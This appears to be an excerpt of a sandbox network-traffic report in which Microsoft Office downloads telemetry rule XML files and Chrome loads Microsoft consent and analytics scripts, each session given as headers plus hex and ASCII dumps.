                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:06 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  100192.168.2.74982713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:05 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1395
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                  x-ms-request-id: 2b667d2c-b01e-003d-150c-3dd32c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185306Z-178bfbc474bgvl54hC1NYCsfuw00000004rg00000000kh4w
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:06 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  101192.168.2.74982613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:05 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1395
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                  x-ms-request-id: 1aea6c4a-501e-005b-1055-3dd7f7000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185306Z-15b8b599d885v8r9hC1TEB104g00000003cg000000009ww3
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:06 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  102192.168.2.74982513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:06 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1358
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE6431446"
                                                                                                                                                                                  x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185306Z-174c587ffdfb74xqhC1TEBhabc000000038g00000000k9nz
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:06 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  103192.168.2.74983013.107.246.634437964C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:07 UTC633OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                  Host: js.monitor.azure.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                  Referer: https://learn.microsoft.com/
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  If-None-Match: 0x8DCEC757C1AD1D1
                                                                                                                                                                                  If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                  2024-11-23 18:53:07 UTC814INHTTP/1.1 304 Not Modified
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:07 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                  Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                  ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                  x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                  x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  x-azure-ref: 20241123T185307Z-15b8b599d88z9sc7hC1TEBkr4w00000003f0000000009dp2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L2_T2
                                                                                                                                                                                  X-Cache: TCP_REMOTE_HIT


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  104192.168.2.74983113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:07 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:08 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1358
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                  x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185308Z-178bfbc474bp8mkvhC1NYCzqnn00000004p000000000f1y1
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:08 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  105192.168.2.74983213.107.246.634437964C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:08 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                  Host: wcpstatic.microsoft.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  2024-11-23 18:53:08 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:08 GMT
                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                  Content-Length: 52717
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Age: 42454
                                                                                                                                                                                  Cache-Control: max-age=43200
                                                                                                                                                                                  Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                  Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                  Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                  x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-azure-ref: 20241123T185308Z-15b8b599d88tmlzshC1TEB4xpn000000036g00000000dpxf
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:08 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                  Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                  2024-11-23 18:53:08 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                  Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                  2024-11-23 18:53:08 UTC712INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                  Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                  2024-11-23 18:53:09 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                                  Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                                  2024-11-23 18:53:09 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                                                                                                                  Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  106192.168.2.74983513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:08 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:08 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1389
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                  x-ms-request-id: 7d97abf5-a01e-0002-5e67-3d5074000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185308Z-174c587ffdftjz9shC1TEBsh98000000033g00000000mfp6
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:08 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
